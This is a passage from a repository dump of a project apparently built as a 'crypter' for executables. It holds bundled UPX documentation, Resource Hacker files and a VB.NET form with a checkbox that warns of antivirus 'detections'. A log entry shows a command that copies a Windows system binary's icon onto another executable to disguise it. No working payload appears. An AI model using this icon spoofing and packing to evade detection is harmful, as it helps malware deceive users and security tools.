https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Release/res/Help/bm05.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/res/Help/bm06.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Release/res/Help/bm06.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/res/Help/bm09.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Release/res/Help/bm09.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/res/Help/bm10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Release/res/Help/bm10.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/res/Help/bm11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Release/res/Help/bm11.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/res/Help/bm12.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Release/res/Help/bm12.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/res/Help/bm14.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Release/res/Help/bm14.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/res/Help/desktop.ini: -------------------------------------------------------------------------------- 1 | [ViewState] 2 | Mode= 3 | Vid= 4 | FolderType=Generic 5 | -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/res/Help/help.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Release/res/Help/help.html -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/res/Help/resource_hacker.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Release/res/Help/resource_hacker.png -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/res/ReadMe.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Release/res/ReadMe.txt -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/res/changes.txt: -------------------------------------------------------------------------------- 1 | Changes in 4.5.28 2 | Update: Major changes (and improvements) to the commandline syntax 3 | Changes in 4.5.28 4 | Update: Numerous changes and improvements to command line support. 5 | Update: Filenames in resource scripts are no longer required to be 6 | enclosed within double quotes unless they contain spaces. 7 | Changes in 4.4.24 8 | Bugfix: The toolbar state wasn't being preserved between sessions 9 | Changes in 4.3.20 10 | Bugfixes: Numerous fixes to commandline processing 11 | Bugfixes: Other minor fixes 12 | Changes in 4.2.5 13 | Bugfix: Compiling Delphi form resources was buggy. 14 | Bugfix: Adding a resource to a file without any resources was broken 15 | New: Can now change a text resource's format (unicode, UTF-8, ANSI) 16 | Changes in 4.2.4 17 | Bugfix: Error when compiling ansi encoded *.rc files 18 | Bugfix: RCDATA resources not displayed in their optimal format 19 | Bugfix: Error when trying to display 'compressed' resources 20 | Bugfix: 'Compressed' files can no longer be modified and saved 21 | Changes in 4.2.3 22 | Bugfix: Significant bug in the recompiler 23 | Bugfix: Minor bug displaying animated cursors 24 | Changes in 4.2.2 25 | Bugfix: Some monochrome images weren't being displayed 26 | Bugfix: Removed extraneous button in "Import Resources" dialog 27 | Bugfix: Manifest resources were being converted to UCS-2 format. 28 | Modified: Increased font sizes in all dialogs 29 | Changes in 4.2.1 (from 4.2.0) 30 | Bugfix: occasional Delphi form was not being decompiled 31 | Bugfix: hiding the toolbar disabled hide/show dialogs/menus. -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/res/info.res: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Release/res/info.res -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/res/res.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Release/res/res.exe -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/res/res.ini: -------------------------------------------------------------------------------- 1 | [Setup] 2 | left=560 3 | top=300 4 | width=800 5 | height=440 6 | MaximizedState=0 7 | vsplit=200 8 | LastDir= 9 | BkColor=16185078 10 | DefaultLang=0 11 | ToolbarSize=1 12 | 13 | [MonospaceFont] 14 | Name=Courier New 15 | Size=9 16 | Color=-16777208 17 | Style=0 18 | 19 | [Font] 20 | Name=Tahoma 21 | Size=9 22 | Color=-16777208 23 | CharSet=1 24 | Style=0 25 | 26 | [MRU List] 27 | 1=C:\Users\aarbe\Desktop\ze.exe 28 | 2=C:\Windows\splwow64.exe 29 | 3=C:\Users\aarbe\Desktop\lol.exe 30 | 4=C:\Windows\SysWOW64\eudcedit.exe 31 | 5= 32 | 6= 33 | 7= 34 | 8= 35 | -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/res/res.log: -------------------------------------------------------------------------------- 1 | [29 Jul 2021, 16:01:46] 2 | 3 | Current Directory: 4 | C:\Users\aarbe\Desktop\YAsbyvQv\FileCloner\bin\Debug 5 | 6 | Commandline: 7 | C:\Users\aarbe\Desktop\YAsbyvQv\FileCloner\bin\Debug\res\\res.exe -addoverwrite C:\Users\aarbe\Desktop\ze.exe, C:\Users\aarbe\Desktop\ze.exe, C:\Windows\splwow64.exe, icongroup, 1,0 8 | 9 | Open : C:\Users\aarbe\Desktop\ze.exe 10 | Save : C:\Users\aarbe\Desktop\ze.exe 11 | Resource: C:\Windows\splwow64.exe 12 | 13 | 14 | Success! 15 | -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/upx/BUGS: -------------------------------------------------------------------------------- 1 | ooooo ooo ooooooooo. ooooooo ooooo 2 | `888' `8' `888 `Y88. `8888 d8' 3 | 888 8 888 .d88' Y888..8P 4 | 888 8 888ooo88P' `8888' 5 | 888 8 888 .8PY888. 6 | `88. .8' 888 d8' `888b 7 | `YbodP' o888o o888o o88888o 8 | 9 | 10 | The Ultimate Packer for eXecutables 11 | Copyright (c) 1996-2020 Markus Oberhumer, Laszlo Molnar & John Reiser 12 | https://upx.github.io 13 | 14 | 15 | Limitations and other things which are not (yet) supported: 16 | =========================================================== 17 | 18 | djgpp2/coff 19 | ----------- 20 | * all overlays (except Allegro pakfiles) are silently stripped 21 | 22 | dos/exe 23 | ------- 24 | * normal dos/exes with new exe headers 25 | * max ~24000 relocation records (...should be enough for everyone ;-) 26 | * exe + sys combined images 27 | 28 | watcom/le 29 | --------- 30 | * 16-bit selector alias fixups 31 | * 16-bit offset relocation for objects larger than 4 KiB 32 | * 16:16 fixups 33 | 34 | If you need any of the above (they're very rare), send us an URL of a 35 | test file. 36 | 37 | * 16-bit objects are not loaded into DOS memory 38 | * There is still a problem with the wdosx extender: if you compress a 39 | watcom/le file which does NOT contain the wdosx extender, and after this 40 | you bind the wdosx stub to the compressed file, then it will work. 41 | Otherwise it won't. 42 | * unpacked pmwlite compressed programs might not work when compressed 43 | with UPX (this is a bug in pmwunlite) 44 | 45 | win32/pe 46 | -------- 47 | * writable shared sections (`--force' *may* work) 48 | * certificates in the image 49 | * compressing files which contain a big BSS requires lots of memory 50 | during compression 51 | 52 | -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/upx/LICENSE: -------------------------------------------------------------------------------- 1 | -----BEGIN PGP SIGNED MESSAGE----- 2 | 3 | 4 | ooooo ooo ooooooooo. ooooooo ooooo 5 | `888' `8' `888 `Y88. `8888 d8' 6 | 888 8 888 .d88' Y888..8P 7 | 888 8 888ooo88P' `8888' 8 | 888 8 888 .8PY888. 9 | `88. .8' 888 d8' `888b 10 | `YbodP' o888o o888o o88888o 11 | 12 | 13 | The Ultimate Packer for eXecutables 14 | Copyright (c) 1996-2000 Markus Oberhumer & Laszlo Molnar 15 | http://wildsau.idv.uni-linz.ac.at/mfx/upx.html 16 | http://www.nexus.hu/upx 17 | http://upx.tsx.org 18 | 19 | 20 | PLEASE CAREFULLY READ THIS LICENSE AGREEMENT, ESPECIALLY IF YOU PLAN 21 | TO MODIFY THE UPX SOURCE CODE OR USE A MODIFIED UPX VERSION. 22 | 23 | 24 | ABSTRACT 25 | ======== 26 | 27 | UPX and UCL are copyrighted software distributed under the terms 28 | of the GNU General Public License (hereinafter the "GPL"). 29 | 30 | The stub which is imbedded in each UPX compressed program is part 31 | of UPX and UCL, and contains code that is under our copyright. The 32 | terms of the GNU General Public License still apply as compressing 33 | a program is a special form of linking with our stub. 34 | 35 | As a special exception we grant the free usage of UPX for all 36 | executables, including commercial programs. 37 | See below for details and restrictions. 38 | 39 | 40 | COPYRIGHT 41 | ========= 42 | 43 | UPX and UCL are copyrighted software. All rights remain with the authors. 44 | 45 | UPX is Copyright (C) 1996-2000 Markus Franz Xaver Johannes Oberhumer 46 | UPX is Copyright (C) 1996-2000 Laszlo Molnar 47 | 48 | UCL is Copyright (C) 1996-2000 Markus Franz Xaver Johannes Oberhumer 49 | 50 | 51 | GNU GENERAL PUBLIC LICENSE 52 | ========================== 53 | 54 | UPX and the UCL library are free software; you can redistribute them 55 | and/or modify them under the terms of the GNU General Public License as 56 | published by the Free Software Foundation; either version 2 of 57 | the License, or (at your option) any later version. 58 | 59 | UPX and UCL are distributed in the hope that they will be useful, 60 | but WITHOUT ANY WARRANTY; without even the implied warranty of 61 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 62 | GNU General Public License for more details. 63 | 64 | You should have received a copy of the GNU General Public License 65 | along with this program; see the file COPYING. 66 | 67 | 68 | SPECIAL EXCEPTION FOR COMPRESSED EXECUTABLES 69 | ============================================ 70 | 71 | The stub which is imbedded in each UPX compressed program is part 72 | of UPX and UCL, and contains code that is under our copyright. The 73 | terms of the GNU General Public License still apply as compressing 74 | a program is a special form of linking with our stub. 75 | 76 | Hereby Markus F.X.J. Oberhumer and Laszlo Molnar grant you special 77 | permission to freely use and distribute all UPX compressed programs 78 | (including commercial ones), subject to the following restrictions: 79 | 80 | 1. You must compress your program with a completely unmodified UPX 81 | version; either with our precompiled version, or (at your option) 82 | with a self compiled version of the unmodified UPX sources as 83 | distributed by us. 84 | 2. This also implies that the UPX stub must be completely unmodfied, i.e. 85 | the stub imbedded in your compressed program must be byte-identical 86 | to the stub that is produced by the official unmodified UPX version. 87 | 3. The decompressor and any other code from the stub must exclusively get 88 | used by the unmodified UPX stub for decompressing your program at 89 | program startup. No portion of the stub may get read, copied, 90 | called or otherwise get used or accessed by your program. 91 | 92 | 93 | ANNOTATIONS 94 | =========== 95 | 96 | - You can use a modified UPX version or modified UPX stub only for 97 | programs that are compatible with the GNU General Public License. 98 | 99 | - We grant you special permission to freely use and distribute all UPX 100 | compressed programs. But any modification of the UPX stub (such as, 101 | but not limited to, removing our copyright string or making your 102 | program non-decompressible) will immediately revoke your right to 103 | use and distribute a UPX compressed program. 104 | 105 | - UPX is not a software protection tool; by requiring that you use 106 | the unmodified UPX version for your proprietary programs we 107 | make sure that any user can decompress your program. This protects 108 | both you and your users as nobody can hide malicious code - 109 | any program that cannot be decompressed is highly suspicious 110 | by definition. 111 | 112 | - You can integrate all or part of UPX and UCL into projects that 113 | are compatible with the GNU GPL, but obviously you cannot grant 114 | any special exceptions beyond the GPL for our code in your project. 115 | 116 | - We want to actively support manufacturers of virus scanners and 117 | similar security software. Please contact us if you would like to 118 | incorporate parts of UPX or UCL into such a product. 119 | 120 | 121 | 122 | Markus F.X.J. Oberhumer Laszlo Molnar 123 | markus.oberhumer@jk.uni-linz.ac.at ml1050@cdata.tvnet.hu 124 | 125 | Linz, Austria, 25 Feb 2000 126 | 127 | 128 | 129 | -----BEGIN PGP SIGNATURE----- 130 | Version: 2.6.3ia 131 | Charset: noconv 132 | 133 | iQCVAwUBOLaLS210fyLu8beJAQFYVAP/ShzENWKLTvedLCjZbDcwaBEHfUVcrGMI 134 | wE7frMkbWT2zmkdv9hW90WmjMhOBu7yhUplvN8BKOtLiolEnZmLCYu8AGCwr5wBf 135 | dfLoClxnzfTtgQv5axF1awp4RwCUH3hf4cDrOVqmAsWXKPHtm4hx96jF6L4oHhjx 136 | OO03+ojZdO8= 137 | =CS52 138 | -----END PGP SIGNATURE----- 139 | -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/upx/README: -------------------------------------------------------------------------------- 1 | ooooo ooo ooooooooo. ooooooo ooooo 2 | `888' `8' `888 `Y88. `8888 d8' 3 | 888 8 888 .d88' Y888..8P 4 | 888 8 888ooo88P' `8888' 5 | 888 8 888 .8PY888. 6 | `88. .8' 888 d8' `888b 7 | `YbodP' o888o o888o o88888o 8 | 9 | 10 | The Ultimate Packer for eXecutables 11 | Copyright (c) 1996-2020 Markus Oberhumer, Laszlo Molnar & John Reiser 12 | https://upx.github.io 13 | 14 | 15 | 16 | WELCOME 17 | ======= 18 | 19 | Welcome to UPX ! 20 | 21 | Please don't forget to read the file LICENSE - UPX is distributed 22 | under the GNU General Public License (GPL) with special exceptions 23 | allowing the distribution of all compressed executables, including 24 | commercial programs. 25 | 26 | 27 | INTRODUCTION 28 | ============ 29 | 30 | UPX is an advanced executable file compressor. UPX will typically 31 | reduce the file size of programs and DLLs by around 50%-70%, thus 32 | reducing disk space, network load times, download times and 33 | other distribution and storage costs. 34 | 35 | Programs and libraries compressed by UPX are completely self-contained 36 | and run exactly as before, with no runtime or memory penalty for most 37 | of the supported formats. 38 | 39 | UPX supports a number of different executable formats, including 40 | Windows 95/98/ME/NT/2000/XP/CE programs and DLLs, DOS programs, 41 | and Linux executables and kernels. 42 | 43 | UPX is free software distributed under the term of the GNU General 44 | Public License. Full source code is available. 45 | 46 | UPX may be distributed and used freely, even with commercial applications. 47 | See the UPX License Agreement for details. 48 | 49 | UPX is rated number one in the well known Archive Comparison Test. Visit 50 | http://compression.ca/ . 51 | 52 | UPX aims to be Commercial Quality Freeware. 53 | 54 | 55 | SHORT DOCUMENTATION 56 | =================== 57 | 58 | 'upx program.exe' will compress a program or DLL. For best compression 59 | results try 'upx --brute program.exe'. 60 | 61 | Please see the file UPX.DOC for the full documentation. The files 62 | NEWS and BUGS also contain various tidbits of information. 63 | 64 | 65 | DISCLAIMER 66 | ========== 67 | 68 | UPX comes with ABSOLUTELY NO WARRANTY; for details see the file LICENSE. 69 | 70 | Having said that, we think that UPX is quite stable now. Indeed we 71 | have compressed lots of files without any problems. Also, the 72 | current version has undergone several months of beta testing - 73 | actually it's almost 8 years since our first public beta. 74 | 75 | This is the first production quality release, and we plan that future 76 | releases will be backward compatible with this version. 77 | 78 | Please report all problems or suggestions to the authors. Thanks. 79 | 80 | 81 | THE FUTURE 82 | ========== 83 | 84 | - AArch64 (64-bit ARM) for Linux and iOS. 85 | 86 | - The Linux approach could probably get ported to a lot of other Unix 87 | variants, at least for other i386 architectures it shouldn't be too 88 | much work. If someone sends me a fresh hard disk and an official 89 | FreeBSD/OpenBSD/NetBSD/Solaris/BeOS... CD I might take a look at it ;-) 90 | 91 | - We will *NOT* add any sort of protection and/or encryption. 92 | This only gives people a false feeling of security because 93 | by definition all protectors/compressors can be broken. 94 | And don't trust any advertisement of authors of other executable 95 | compressors about this topic - just do a websearch on "unpackers"... 96 | 97 | - Fix all remaining bugs - keep your reports coming ;-) 98 | 99 | - See the file PROJECTS in the source code distribution if you want 100 | to contribute. 101 | 102 | 103 | COPYRIGHT 104 | ========= 105 | 106 | Copyright (C) 1996-2020 Markus Franz Xaver Johannes Oberhumer 107 | Copyright (C) 1996-2020 Laszlo Molnar 108 | Copyright (C) 2000-2020 John F. Reiser 109 | 110 | This program may be used freely, and you are welcome to 111 | redistribute it under certain conditions. 112 | 113 | This program is distributed in the hope that it will be useful, 114 | but WITHOUT ANY WARRANTY; without even the implied warranty of 115 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 116 | UPX License Agreement for more details. 117 | 118 | You should have received a copy of the UPX License Agreement along 119 | with this program; see the file LICENSE. If not, visit the UPX home page. 120 | 121 | 122 | Share and enjoy, 123 | Markus & Laszlo & John 124 | 125 | 126 | Markus F.X.J. Oberhumer Laszlo Molnar 127 | 128 | 129 | John F. Reiser 130 | 131 | 132 | 133 | [ The term UPX is a shorthand for the Ultimate Packer for eXecutables 134 | and holds no connection with potential owners of registered trademarks 135 | or other rights. ] 136 | 137 | [ Feel free to contact us if you have commercial compression requirements 138 | or interesting job offers. ] 139 | 140 | -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/upx/README.1ST: -------------------------------------------------------------------------------- 1 | ooooo ooo ooooooooo. ooooooo ooooo 2 | `888' `8' `888 `Y88. `8888 d8' 3 | 888 8 888 .d88' Y888..8P 4 | 888 8 888ooo88P' `8888' 5 | 888 8 888 .8PY888. 6 | `88. .8' 888 d8' `888b 7 | `YbodP' o888o o888o o88888o 8 | 9 | 10 | The Ultimate Packer for eXecutables 11 | Copyright (c) 1996-2020 Markus Oberhumer, Laszlo Molnar & John Reiser 12 | https://upx.github.io 13 | 14 | 15 | MAJOR NEWS IN UPX 3 16 | =================== 17 | 18 | The main news since UPX 2 are: 19 | 20 | * new format: added support for linux elf/arm 21 | 22 | * better compression using the LZMA algorithm (option '--lzma') 23 | 24 | * better support for MacOS 25 | -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/upx/THANKS: -------------------------------------------------------------------------------- 1 | ooooo ooo ooooooooo. ooooooo ooooo 2 | `888' `8' `888 `Y88. `8888 d8' 3 | 888 8 888 .d88' Y888..8P 4 | 888 8 888ooo88P' `8888' 5 | 888 8 888 .8PY888. 6 | `88. .8' 888 d8' `888b 7 | `YbodP' o888o o888o o88888o 8 | 9 | 10 | The Ultimate Packer for eXecutables 11 | Copyright (c) 1996-2020 Markus Oberhumer, Laszlo Molnar & John Reiser 12 | https://upx.github.io 13 | 14 | 15 | .___.. . 16 | | |_ _.._ ;_/ __ 17 | | [ )(_][ )| \_) 18 | -------------------- 19 | 20 | UPX would not be what it is today without the invaluable help of 21 | everybody who was kind enough to spend time testing it, using it 22 | in applications and reporting bugs. 23 | 24 | The following people made especially gracious contributions of their 25 | time and energy in helping to track down bugs, add new features, and 26 | generally assist in the UPX maintainership process: 27 | 28 | Adam Ierymenko 29 | for severals ideas for the Linux version 30 | Andi Kleen and Jamie Lokier 31 | for the /proc/self/fd/X and other Linux suggestions 32 | Andreas Muegge 33 | for the Win32 GUI 34 | Atli Mar Gudmundsson 35 | for several comments on the win32/pe stub 36 | Charles W. Sandmann 37 | for the idea with the stubless decompressor in djgpp2/coff 38 | Ice 39 | for debugging the PE headersize problem down 40 | Joergen Ibsen and d'b 41 | for the relocation & address optimization ideas 42 | John S. Fine 43 | for the new version of the dos/exe decompressor 44 | Lukundoo 45 | for beta testing 46 | Michael Devore 47 | for initial dos/exe device driver support 48 | Oleg V. Volkov 49 | for various FreeBSD specific informations 50 | The Owl & G-RoM 51 | for the --compress-icons fix 52 | Ralph Roth 53 | for reporting several bugs 54 | Salvador Eduardo Tropea 55 | for beta testing 56 | Stefan Widmann 57 | for the win32/pe TLS callback support 58 | The WINE project (http://www.winehq.com/) 59 | for lots of useful information found in their PE loader sources 60 | Natascha 61 | 62 | -------------------------------------------------------------------------------- /French Protector Build 230/bin/Release/upx/upx.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/bin/Release/upx/upx.exe -------------------------------------------------------------------------------- /French Protector Build 230/compress.Designer.vb: -------------------------------------------------------------------------------- 1 |  2 | Partial Class compress 3 | Inherits System.Windows.Forms.Form 4 | 5 | 'Form overrides dispose to clean up the component list. 6 | 7 | Protected Overrides Sub Dispose(ByVal disposing As Boolean) 8 | Try 9 | If disposing AndAlso components IsNot Nothing Then 10 | components.Dispose() 11 | End If 12 | Finally 13 | MyBase.Dispose(disposing) 14 | End Try 15 | End Sub 16 | 17 | 'Required by the Windows Form Designer 18 | Private components As System.ComponentModel.IContainer 19 | 20 | 'NOTE: The following procedure is required by the Windows Form Designer 21 | 'It can be modified using the Windows Form Designer. 22 | 'Do not modify it using the code editor. 23 | 24 | Private Sub InitializeComponent() 25 | Me.components = New System.ComponentModel.Container() 26 | Me.Panel2 = New System.Windows.Forms.Panel() 27 | Me.Guna2GradientButton1 = New Guna.UI2.WinForms.Guna2GradientButton() 28 | Me.PictureBox1 = New System.Windows.Forms.PictureBox() 29 | Me.Guna2GradientButton2 = New Guna.UI2.WinForms.Guna2GradientButton() 30 | Me.Label1 = New System.Windows.Forms.Label() 31 | Me.Panel1 = New System.Windows.Forms.Panel() 32 | Me.Guna2CheckBox2 = New Guna.UI2.WinForms.Guna2CheckBox() 33 | Me.Guna2DragControl1 = New Guna.UI2.WinForms.Guna2DragControl(Me.components) 34 | Me.Guna2DragControl2 = New Guna.UI2.WinForms.Guna2DragControl(Me.components) 35 | Me.Guna2DragControl3 = New Guna.UI2.WinForms.Guna2DragControl(Me.components) 36 | Me.Panel2.SuspendLayout() 37 | CType(Me.PictureBox1, System.ComponentModel.ISupportInitialize).BeginInit() 38 | Me.Panel1.SuspendLayout() 39 | Me.SuspendLayout() 40 | ' 41 | 'Panel2 42 | ' 43 | Me.Panel2.BackColor = System.Drawing.Color.FromArgb(CType(CType(23, Byte), Integer), CType(CType(23, Byte), Integer), CType(CType(23, Byte), Integer)) 44 | Me.Panel2.Controls.Add(Me.Guna2GradientButton1) 45 | Me.Panel2.Controls.Add(Me.PictureBox1) 46 | Me.Panel2.Controls.Add(Me.Guna2GradientButton2) 47 | Me.Panel2.Controls.Add(Me.Label1) 48 | Me.Panel2.Location = New System.Drawing.Point(-9, 0) 49 | Me.Panel2.Name = "Panel2" 50 | Me.Panel2.Size = New System.Drawing.Size(328, 56) 51 | Me.Panel2.TabIndex = 1 52 | ' 53 | 'Guna2GradientButton1 54 | ' 55 | Me.Guna2GradientButton1.Animated = True 56 | Me.Guna2GradientButton1.BackColor = System.Drawing.Color.Transparent 57 | Me.Guna2GradientButton1.BorderStyle = System.Drawing.Drawing2D.DashStyle.Dot 58 | Me.Guna2GradientButton1.CheckedState.Parent = Me.Guna2GradientButton1 59 | Me.Guna2GradientButton1.CustomImages.Parent = Me.Guna2GradientButton1 60 | Me.Guna2GradientButton1.FillColor = System.Drawing.Color.IndianRed 61 | Me.Guna2GradientButton1.FillColor2 = System.Drawing.Color.FromArgb(CType(CType(23, Byte), Integer), CType(CType(23, Byte), Integer), CType(CType(23, Byte), Integer)) 62 | Me.Guna2GradientButton1.Font = New System.Drawing.Font("Segoe UI", 9.0!) 63 | Me.Guna2GradientButton1.ForeColor = System.Drawing.Color.White 64 | Me.Guna2GradientButton1.HoverState.Parent = Me.Guna2GradientButton1 65 | Me.Guna2GradientButton1.IndicateFocus = True 66 | Me.Guna2GradientButton1.Location = New System.Drawing.Point(258, 14) 67 | Me.Guna2GradientButton1.Name = "Guna2GradientButton1" 68 | Me.Guna2GradientButton1.ShadowDecoration.Parent = Me.Guna2GradientButton1 69 | Me.Guna2GradientButton1.Size = New System.Drawing.Size(43, 25) 70 | Me.Guna2GradientButton1.TabIndex = 9 71 | Me.Guna2GradientButton1.Text = "X" 72 | Me.Guna2GradientButton1.UseTransparentBackground = True 73 | ' 74 | 'PictureBox1 75 | ' 76 | 77 | Me.PictureBox1.Location = New System.Drawing.Point(17, 11) 78 | Me.PictureBox1.Name = "PictureBox1" 79 | Me.PictureBox1.Size = New System.Drawing.Size(31, 30) 80 | Me.PictureBox1.SizeMode = System.Windows.Forms.PictureBoxSizeMode.StretchImage 81 | Me.PictureBox1.TabIndex = 10 82 | Me.PictureBox1.TabStop = False 83 | ' 84 | 'Guna2GradientButton2 85 | ' 86 | Me.Guna2GradientButton2.Animated = True 87 | Me.Guna2GradientButton2.BackColor = System.Drawing.Color.Transparent 88 | Me.Guna2GradientButton2.BorderStyle = System.Drawing.Drawing2D.DashStyle.Dot 89 | Me.Guna2GradientButton2.CheckedState.Parent = Me.Guna2GradientButton2 90 | Me.Guna2GradientButton2.CustomImages.Parent = Me.Guna2GradientButton2 91 | Me.Guna2GradientButton2.FillColor = System.Drawing.Color.IndianRed 92 | Me.Guna2GradientButton2.FillColor2 = System.Drawing.Color.FromArgb(CType(CType(23, Byte), Integer), CType(CType(23, Byte), Integer), CType(CType(23, Byte), Integer)) 93 | Me.Guna2GradientButton2.Font = New System.Drawing.Font("Segoe UI", 9.0!) 94 | Me.Guna2GradientButton2.ForeColor = System.Drawing.Color.White 95 | Me.Guna2GradientButton2.HoverState.Parent = Me.Guna2GradientButton2 96 | Me.Guna2GradientButton2.IndicateFocus = True 97 | Me.Guna2GradientButton2.Location = New System.Drawing.Point(599, 21) 98 | Me.Guna2GradientButton2.Name = "Guna2GradientButton2" 99 | Me.Guna2GradientButton2.ShadowDecoration.Parent = Me.Guna2GradientButton2 100 | Me.Guna2GradientButton2.Size = New System.Drawing.Size(43, 25) 101 | Me.Guna2GradientButton2.TabIndex = 2 102 | Me.Guna2GradientButton2.Text = "X" 103 | Me.Guna2GradientButton2.UseTransparentBackground = True 104 | ' 105 | 'Label1 106 | ' 107 | Me.Label1.AutoSize = True 108 | Me.Label1.Font = New System.Drawing.Font("Microsoft Sans Serif", 11.25!, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, CType(0, Byte)) 109 | Me.Label1.ForeColor = System.Drawing.Color.White 110 | Me.Label1.ImageAlign = System.Drawing.ContentAlignment.BottomLeft 111 | Me.Label1.Location = New System.Drawing.Point(54, 17) 112 | Me.Label1.Name = "Label1" 113 | Me.Label1.Size = New System.Drawing.Size(78, 18) 114 | Me.Label1.TabIndex = 0 115 | Me.Label1.Text = "Compress" 116 | ' 117 | 'Panel1 118 | ' 119 | Me.Panel1.BackColor = System.Drawing.Color.FromArgb(CType(CType(27, Byte), Integer), CType(CType(27, Byte), Integer), CType(CType(27, Byte), Integer)) 120 | Me.Panel1.Controls.Add(Me.Guna2CheckBox2) 121 | Me.Panel1.Controls.Add(Me.Panel2) 122 | Me.Panel1.Location = New System.Drawing.Point(0, 0) 123 | Me.Panel1.Name = "Panel1" 124 | Me.Panel1.Size = New System.Drawing.Size(304, 135) 125 | Me.Panel1.TabIndex = 1 126 | ' 127 | 'Guna2CheckBox2 128 | ' 129 | Me.Guna2CheckBox2.AutoSize = True 130 | Me.Guna2CheckBox2.BackColor = System.Drawing.Color.FromArgb(CType(CType(27, Byte), Integer), CType(CType(27, Byte), Integer), CType(CType(27, Byte), Integer)) 131 | Me.Guna2CheckBox2.CheckedState.BorderColor = System.Drawing.Color.IndianRed 132 | Me.Guna2CheckBox2.CheckedState.BorderRadius = 5 133 | Me.Guna2CheckBox2.CheckedState.BorderThickness = 5 134 | Me.Guna2CheckBox2.CheckedState.FillColor = System.Drawing.Color.IndianRed 135 | Me.Guna2CheckBox2.Font = New System.Drawing.Font("Microsoft Sans Serif", 8.25!) 136 | Me.Guna2CheckBox2.ForeColor = System.Drawing.Color.White 137 | Me.Guna2CheckBox2.Location = New System.Drawing.Point(23, 96) 138 | Me.Guna2CheckBox2.Name = "Guna2CheckBox2" 139 | Me.Guna2CheckBox2.Size = New System.Drawing.Size(230, 17) 140 | Me.Guna2CheckBox2.TabIndex = 8 141 | Me.Guna2CheckBox2.Text = "Enable Compress [ May Cause Detections ]" 142 | Me.Guna2CheckBox2.UncheckedState.BorderColor = System.Drawing.Color.IndianRed 143 | Me.Guna2CheckBox2.UncheckedState.BorderRadius = 5 144 | Me.Guna2CheckBox2.UncheckedState.BorderThickness = 5 145 | Me.Guna2CheckBox2.UncheckedState.FillColor = System.Drawing.Color.FromArgb(CType(CType(23, Byte), Integer), CType(CType(23, Byte), Integer), CType(CType(23, Byte), Integer)) 146 | Me.Guna2CheckBox2.UseVisualStyleBackColor = False 147 | ' 148 | 'Guna2DragControl1 149 | ' 150 | Me.Guna2DragControl1.TargetControl = Me.Panel1 151 | ' 152 | 'Guna2DragControl2 153 | ' 154 | Me.Guna2DragControl2.TargetControl = Me.Panel2 155 | ' 156 | 'Guna2DragControl3 157 | ' 158 | Me.Guna2DragControl3.TargetControl = Me 159 | ' 160 | 'compress 161 | ' 162 | Me.AutoScaleDimensions = New System.Drawing.SizeF(6.0!, 13.0!) 163 | Me.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font 164 | Me.ClientSize = New System.Drawing.Size(301, 